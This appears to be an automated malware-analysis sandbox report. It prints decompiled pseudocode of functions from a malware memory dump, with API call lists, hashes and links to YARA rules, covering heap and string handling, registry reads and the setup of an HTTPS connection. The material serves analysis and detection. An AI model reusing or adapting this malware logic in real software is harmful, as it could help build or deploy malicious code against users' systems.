								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                                                                                                  0x031a78ed
                                                                                                                                  0x031a78f4
                                                                                                                                  0x031a78f9
                                                                                                                                  0x031a78fc
                                                                                                                                  0x031a7903
                                                                                                                                  0x031a7906
                                                                                                                                  0x031a7909
                                                                                                                                  0x031a790e
                                                                                                                                  0x031a7913
                                                                                                                                  0x031a7a67
                                                                                                                                  0x031a7a69
                                                                                                                                  0x031a7a6b
                                                                                                                                  0x031a7a70
                                                                                                                                  0x031a7a70
                                                                                                                                  0x031a7919
                                                                                                                                  0x031a791c
                                                                                                                                  0x031a791f
                                                                                                                                  0x031a7921
                                                                                                                                  0x031a7921
                                                                                                                                  0x031a7925
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7929
                                                                                                                                  0x031a7955
                                                                                                                                  0x031a795a
                                                                                                                                  0x031a795c
                                                                                                                                  0x031a795c
                                                                                                                                  0x031a795f
                                                                                                                                  0x031a7962
                                                                                                                                  0x031a7962
                                                                                                                                  0x031a7964
                                                                                                                                  0x00000000
                                                                                                                                  0x031a792f
                                                                                                                                  0x031a7931
                                                                                                                                  0x031a7950
                                                                                                                                  0x031a7950
                                                                                                                                  0x031a7967
                                                                                                                                  0x031a7967
                                                                                                                                  0x031a7968
                                                                                                                                  0x031a7968
                                                                                                                                  0x031a796b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a796b
                                                                                                                                  0x031a7935
                                                                                                                                  0x031a797c
                                                                                                                                  0x031a7980
                                                                                                                                  0x031a7a5a
                                                                                                                                  0x031a7a5c
                                                                                                                                  0x031a7a5c
                                                                                                                                  0x031a7a5d
                                                                                                                                  0x031a7a60
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7a60
                                                                                                                                  0x031a7989
                                                                                                                                  0x031a799a
                                                                                                                                  0x031a799e
                                                                                                                                  0x031a7a56
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7a56
                                                                                                                                  0x031a79a4
                                                                                                                                  0x031a79a7
                                                                                                                                  0x031a79ab
                                                                                                                                  0x031a79af
                                                                                                                                  0x031a79b4
                                                                                                                                  0x031a7a4c
                                                                                                                                  0x031a7a4c
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7a52
                                                                                                                                  0x031a79bf
                                                                                                                                  0x031a79c8
                                                                                                                                  0x031a79dc
                                                                                                                                  0x031a79e3
                                                                                                                                  0x031a79f8
                                                                                                                                  0x031a79fe
                                                                                                                                  0x031a7a06
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7a08
                                                                                                                                  0x031a7a08
                                                                                                                                  0x031a7a08
                                                                                                                                  0x031a7a0f
                                                                                                                                  0x031a7a17
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7a19
                                                                                                                                  0x031a7a22
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7a24
                                                                                                                                  0x031a7a26
                                                                                                                                  0x031a7a29
                                                                                                                                  0x031a7a29
                                                                                                                                  0x031a7a2c
                                                                                                                                  0x031a7a30
                                                                                                                                  0x031a7a33
                                                                                                                                  0x031a7a39
                                                                                                                                  0x031a7a3c
                                                                                                                                  0x031a7a43
                                                                                                                                  0x00000000
                                                                                                                                  0x031a79bf
                                                                                                                                  0x031a793a
                                                                                                                                  0x031a7942
                                                                                                                                  0x031a7948
                                                                                                                                  0x031a794a
                                                                                                                                  0x031a794a
                                                                                                                                  0x031a794d
                                                                                                                                  0x031a794f
                                                                                                                                  0x00000000
                                                                                                                                  0x031a794f
                                                                                                                                  0x031a7929
                                                                                                                                  0x031a796f
                                                                                                                                  0x031a7974
                                                                                                                                  0x031a7976
                                                                                                                                  0x031a7976
                                                                                                                                  0x031a7979
                                                                                                                                  0x031a7979
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • lstrcpy.KERNEL32(69B25F45,00000020), ref: 031A79E3
                                                                                                                                  • lstrcat.KERNEL32(69B25F45,00000020), ref: 031A79F8
                                                                                                                                  • lstrcmp.KERNEL32(00000000,69B25F45), ref: 031A7A0F
                                                                                                                                  • lstrlen.KERNEL32(69B25F45), ref: 031A7A33
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3214092121-3916222277
                                                                                                                                  • Opcode ID: bed33bcf092650a5700e80b94a33ce157d6ca177a7f5476208124175e87a8f36
                                                                                                                                  • Instruction ID: 985da3f30a4c44dda0904d8f779aab04f3dd4f8151f718c6c025f24fd227fe31
                                                                                                                                  • Opcode Fuzzy Hash: bed33bcf092650a5700e80b94a33ce157d6ca177a7f5476208124175e87a8f36
                                                                                                                                  • Instruction Fuzzy Hash: 8351C139A04A18EBCF15DFDDC5406ADFBB6EF49326F09805AE8149B281C7319741CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A121A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 18%
                                                                                                                                  			E031A121A(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t63;
				intOrPtr* _t64;
				char* _t65;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t63 = __esi + 0x2c;
				_v16 = 0;
				 *_t63 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t63);
				_t64 = __imp__; // 0x6fa7fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t64() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E031A75F6(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t64() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t65 = E031A75F6(_v8 + 1);
							if(_t65 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t65, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t65;
							}
						}
						E031A4AAB(_v20);
					}
					goto L12;
				}
			}












                                                                                                                                  0x031a1220
                                                                                                                                  0x031a1227
                                                                                                                                  0x031a122a
                                                                                                                                  0x031a122d
                                                                                                                                  0x031a122f
                                                                                                                                  0x031a1234
                                                                                                                                  0x031a1317
                                                                                                                                  0x031a131d
                                                                                                                                  0x031a131d
                                                                                                                                  0x031a123e
                                                                                                                                  0x031a1245
                                                                                                                                  0x031a124d
                                                                                                                                  0x031a130e
                                                                                                                                  0x031a1314
                                                                                                                                  0x00000000
                                                                                                                                  0x031a1314
                                                                                                                                  0x031a1256
                                                                                                                                  0x031a125a
                                                                                                                                  0x031a125b
                                                                                                                                  0x031a125c
                                                                                                                                  0x031a1262
                                                                                                                                  0x031a1263
                                                                                                                                  0x031a1268
                                                                                                                                  0x031a126f
                                                                                                                                  0x00000000
                                                                                                                                  0x031a1275
                                                                                                                                  0x031a1284
                                                                                                                                  0x031a1287
                                                                                                                                  0x031a128a
                                                                                                                                  0x031a1293
                                                                                                                                  0x031a1298
                                                                                                                                  0x031a129d
                                                                                                                                  0x031a1305
                                                                                                                                  0x031a129f
                                                                                                                                  0x031a12a2
                                                                                                                                  0x031a12a6
                                                                                                                                  0x031a12a7
                                                                                                                                  0x031a12a8
                                                                                                                                  0x031a12a9
                                                                                                                                  0x031a12ab
                                                                                                                                  0x031a12b2
                                                                                                                                  0x031a12f8
                                                                                                                                  0x031a12b4
                                                                                                                                  0x031a12b4
                                                                                                                                  0x031a12bf
                                                                                                                                  0x031a12cd
                                                                                                                                  0x031a12d1
                                                                                                                                  0x031a12e9
                                                                                                                                  0x031a12d3
                                                                                                                                  0x031a12dc
                                                                                                                                  0x031a12e4
                                                                                                                                  0x031a12e4
                                                                                                                                  0x031a12d1
                                                                                                                                  0x031a12fe
                                                                                                                                  0x031a12fe
                                                                                                                                  0x00000000
                                                                                                                                  0x031a129d

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 031A130E
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • wcstombs.NTDLL ref: 031A12DC
                                                                                                                                  • GetLastError.KERNEL32 ref: 031A12F2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AllocateHeapwcstombs
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 2631933831-3251738875
                                                                                                                                  • Opcode ID: 24143563aafb3a74f0b4d248c535f2de1b2e931577438ee54f04d896e7f89019
                                                                                                                                  • Instruction ID: cf6d0a94dd1ad803b112b7052fad742b015a61f7947ad6f1e5474646b310e14b
                                                                                                                                  • Opcode Fuzzy Hash: 24143563aafb3a74f0b4d248c535f2de1b2e931577438ee54f04d896e7f89019
                                                                                                                                  • Instruction Fuzzy Hash: C13109B9900A09FFDB14DFA9C980AAEB7B8FF0C315F144569E542E3250D7309A449B60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A502E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A502E(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E031A37AC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x31ad2e0; // 0x2a2a5a8
				_t4 = _t24 + 0x31aedc8; // 0x5bd9370
				_t5 = _t24 + 0x31aed70; // 0x4f0053
				_t26 = E031A4B28( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x31ad2e0; // 0x2a2a5a8
						_t11 = _t32 + 0x31aedbc; // 0x5bd9364
						_t48 = _t11;
						_t12 = _t32 + 0x31aed70; // 0x4f0053
						_t52 = E031A131E(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x31ad2e0; // 0x2a2a5a8
							_t13 = _t35 + 0x31aee06; // 0x30314549
							_t37 = E031A117A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x31ad294 - 6;
								if( *0x31ad294 <= 6) {
									_t42 =  *0x31ad2e0; // 0x2a2a5a8
									_t15 = _t42 + 0x31aec12; // 0x52384549
									E031A117A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x31ad2e0; // 0x2a2a5a8
							_t17 = _t38 + 0x31aee00; // 0x5bd93a8
							_t18 = _t38 + 0x31aedd8; // 0x680043
							_t45 = E031A5DDA(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x31ad270, 0, _t52);
						}
					}
					HeapFree( *0x31ad270, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E031A51BB(_t54);
				}
				return _t45;
			}



















                                                                                                                                  0x031a502e
                                                                                                                                  0x031a503e
                                                                                                                                  0x031a5041
                                                                                                                                  0x031a5048
                                                                                                                                  0x031a504a
                                                                                                                                  0x031a504a
                                                                                                                                  0x031a504d
                                                                                                                                  0x031a5052
                                                                                                                                  0x031a5059
                                                                                                                                  0x031a5066
                                                                                                                                  0x031a506b
                                                                                                                                  0x031a506f
                                                                                                                                  0x031a507d
                                                                                                                                  0x031a508b
                                                                                                                                  0x031a508f
                                                                                                                                  0x031a5120
                                                                                                                                  0x031a5120
                                                                                                                                  0x031a5095
                                                                                                                                  0x031a5095
                                                                                                                                  0x031a509a
                                                                                                                                  0x031a509a
                                                                                                                                  0x031a50a1
                                                                                                                                  0x031a50ad
                                                                                                                                  0x031a50af
                                                                                                                                  0x031a50b1
                                                                                                                                  0x031a50b3
                                                                                                                                  0x031a50ba
                                                                                                                                  0x031a50c5
                                                                                                                                  0x031a50cc
                                                                                                                                  0x031a50ce
                                                                                                                                  0x031a50d5
                                                                                                                                  0x031a50d7
                                                                                                                                  0x031a50de
                                                                                                                                  0x031a50e9
                                                                                                                                  0x031a50e9
                                                                                                                                  0x031a50d5
                                                                                                                                  0x031a50ee
                                                                                                                                  0x031a50f3
                                                                                                                                  0x031a50fa
                                                                                                                                  0x031a5118
                                                                                                                                  0x031a511a
                                                                                                                                  0x031a511a
                                                                                                                                  0x031a50b1
                                                                                                                                  0x031a512c
                                                                                                                                  0x031a512c
                                                                                                                                  0x031a512e
                                                                                                                                  0x031a5133
                                                                                                                                  0x031a5135
                                                                                                                                  0x031a5135
                                                                                                                                  0x031a5140

                                                                                                                                  APIs
                                                                                                                                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05BD9370,00000000,?,74E5F710,00000000,74E5F730), ref: 031A507D
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05BD93A8,?,00000000,30314549,00000014,004F0053,05BD9364), ref: 031A511A
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,031A54EF), ref: 031A512C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3298025750-8415677
                                                                                                                                  • Opcode ID: 07b1a43f8c5c0425c5e1bb1ba31543b0d841e63968b6ceb6f438ee3cc5f901fe
                                                                                                                                  • Instruction ID: 50728fbe7f6a089ccf02d48565b2b4fb79a186afae7f209f2307349061462a40
                                                                                                                                  • Opcode Fuzzy Hash: 07b1a43f8c5c0425c5e1bb1ba31543b0d841e63968b6ceb6f438ee3cc5f901fe
                                                                                                                                  • Instruction Fuzzy Hash: E831C179900E08BFDB11EBA8ED84EAE7BBDFF0D742F180166E500AB110D7719A45DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8EC1E0, Relevance: 6.7, APIs: 1, Strings: 2, Instructions: 1462COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,6E97C338,000008BB), ref: 6E8ED345
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName
                                                                                                                                  • String ID: 1$N
                                                                                                                                  • API String ID: 514040917-3127171972
                                                                                                                                  • Opcode ID: e01c0125f54417ce094f99f143926840c8aab4021420303a4f29a0666aaf6396
                                                                                                                                  • Instruction ID: 92d9c2a95a581243fc26319c9670bf7367607d88b09f3bb69790878a78ee42e5
                                                                                                                                  • Opcode Fuzzy Hash: e01c0125f54417ce094f99f143926840c8aab4021420303a4f29a0666aaf6396
                                                                                                                                  • Instruction Fuzzy Hash: B7F260F150C9B08ECF08CF69CA90A797BB2FF97305B14891AD5459A785E3B8D58CDB08
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A3DA0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(80000002), ref: 031A3DFD
                                                                                                                                  • SysAllocString.OLEAUT32(031A28D9), ref: 031A3E41
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A3E55
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A3E63
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 344208780-0
                                                                                                                                  • Opcode ID: 529ccc6c84822f2af1963bc2fe5a197c510df6acf0b548f23c00a75740308478
                                                                                                                                  • Instruction ID: def1a4b84e6caf01315d4f9e203fa761a7788b580907cf9e7040f9c45f6fca8d
                                                                                                                                  • Opcode Fuzzy Hash: 529ccc6c84822f2af1963bc2fe5a197c510df6acf0b548f23c00a75740308478
                                                                                                                                  • Instruction Fuzzy Hash: 19314F7A900609EFCB05DF98D8909AEBBB9FF0C341B24882EF515D7250D7309A91CFA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A7749, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 23%
                                                                                                                                  			E031A7749(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _t34;
				long _t36;
				unsigned int _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E031A1922(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0) {
						L5:
						_a4 = 4;
					} else {
						if(_t69 != 0) {
							L4:
							_a4 = 0;
						} else {
							_t37 = _t37 >> 8;
							if(_t37 > 2) {
								goto L5;
							} else {
								goto L4;
							}
						}
					}
					__imp__(_t63, _a4, 0, 0, 0); // executed
					 *(_t66 + 0x10) = _t37;
					_t38 = E031A4AAB(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E031A1922(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x6fa7f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E031A4AAB(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E031A1922(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
										_t42 =  *0x31ad2e0; // 0x2a2a5a8
										_t19 = _t42 + 0x31ae758; // 0x450047
										_t43 = _t19;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E031A4AAB(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}




















                                                                                                                                  0x031a7749
                                                                                                                                  0x031a7758
                                                                                                                                  0x031a775e
                                                                                                                                  0x031a788f
                                                                                                                                  0x031a788f
                                                                                                                                  0x031a7764
                                                                                                                                  0x031a7764
                                                                                                                                  0x031a776a
                                                                                                                                  0x031a776c
                                                                                                                                  0x031a777c
                                                                                                                                  0x031a777c
                                                                                                                                  0x031a776e
                                                                                                                                  0x031a776e
                                                                                                                                  0x031a7777
                                                                                                                                  0x031a7777
                                                                                                                                  0x031a7770
                                                                                                                                  0x031a7770
                                                                                                                                  0x031a7775
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7775
                                                                                                                                  0x031a776e
                                                                                                                                  0x031a778a
                                                                                                                                  0x031a7791
                                                                                                                                  0x031a7794
                                                                                                                                  0x031a779c
                                                                                                                                  0x00000000
                                                                                                                                  0x031a77a2
                                                                                                                                  0x031a77a4
                                                                                                                                  0x031a77a9
                                                                                                                                  0x031a77ae
                                                                                                                                  0x00000000
                                                                                                                                  0x031a77b4
                                                                                                                                  0x031a77b4
                                                                                                                                  0x031a77bd
                                                                                                                                  0x031a77d4
                                                                                                                                  0x031a77e0
                                                                                                                                  0x031a77e9
                                                                                                                                  0x031a77ec
                                                                                                                                  0x031a77f4
                                                                                                                                  0x00000000
                                                                                                                                  0x031a77fa
                                                                                                                                  0x031a77fd
                                                                                                                                  0x031a7809
                                                                                                                                  0x031a780f
                                                                                                                                  0x00000000
                                                                                                                                  0x031a7811
                                                                                                                                  0x031a7814
                                                                                                                                  0x031a781d
                                                                                                                                  0x031a781d
                                                                                                                                  0x031a7827
                                                                                                                                  0x031a782e
                                                                                                                                  0x031a7831
                                                                                                                                  0x031a7836
                                                                                                                                  0x031a783b
                                                                                                                                  0x00000000
                                                                                                                                  0x031a783d
                                                                                                                                  0x031a783f
                                                                                                                                  0x031a784b
                                                                                                                                  0x031a784e
                                                                                                                                  0x031a7856
                                                                                                                                  0x031a7858
                                                                                                                                  0x031a7869
                                                                                                                                  0x031a7869
                                                                                                                                  0x031a786b
                                                                                                                                  0x031a786f
                                                                                                                                  0x031a7870
                                                                                                                                  0x031a7872
                                                                                                                                  0x031a7879
                                                                                                                                  0x00000000
                                                                                                                                  0x031a787b
                                                                                                                                  0x031a787b
                                                                                                                                  0x031a787f
                                                                                                                                  0x031a7880
                                                                                                                                  0x031a7882
                                                                                                                                  0x031a7889
                                                                                                                                  0x00000000
                                                                                                                                  0x031a788b
                                                                                                                                  0x031a788b
                                                                                                                                  0x031a788b
                                                                                                                                  0x031a7889
                                                                                                                                  0x031a7879
                                                                                                                                  0x031a783b
                                                                                                                                  0x031a780f
                                                                                                                                  0x031a77bf
                                                                                                                                  0x031a77ca
                                                                                                                                  0x031a77ce
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a77ce
                                                                                                                                  0x031a77bd
                                                                                                                                  0x031a77ae
                                                                                                                                  0x031a779c
                                                                                                                                  0x031a7898

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A1922: lstrlen.KERNEL32(?,00000000,05BD9B38,00000000,031A74FF,05BD9D16,?,?,?,?,?,69B25F44,00000005,031AD00C), ref: 031A1929
                                                                                                                                    • Part of subcall function 031A1922: mbstowcs.NTDLL ref: 031A1952
                                                                                                                                    • Part of subcall function 031A1922: memset.NTDLL ref: 031A1964
                                                                                                                                  • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,031A544C,00000000,00000000,05BD9618,?,?,031A2A8A,?,05BD9618,0000EA60), ref: 031A7764
                                                                                                                                  • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,031A544C,00000000,00000000,05BD9618,?,?,031A2A8A,?,05BD9618,0000EA60), ref: 031A788F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 4097109750-3251738875
                                                                                                                                  • Opcode ID: dc0af5266dceeda72411b410287ff41068bc620b1f64d13b94cb07be7dc5c4f8
                                                                                                                                  • Instruction ID: 3baa4934ad544aa569e94f967165b8baa05491d7314517eda94c74a64b99675c
                                                                                                                                  • Opcode Fuzzy Hash: dc0af5266dceeda72411b410287ff41068bc620b1f64d13b94cb07be7dc5c4f8
                                                                                                                                  • Instruction Fuzzy Hash: 7941537A100A05BFDB25DFE8DC85EAA7BBDEB0C782F044529F64295090D771DA84DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A117A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memorytimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A117A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E031A1922(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E031A9371(__ecx, _a4, _a8, _t25); // executed
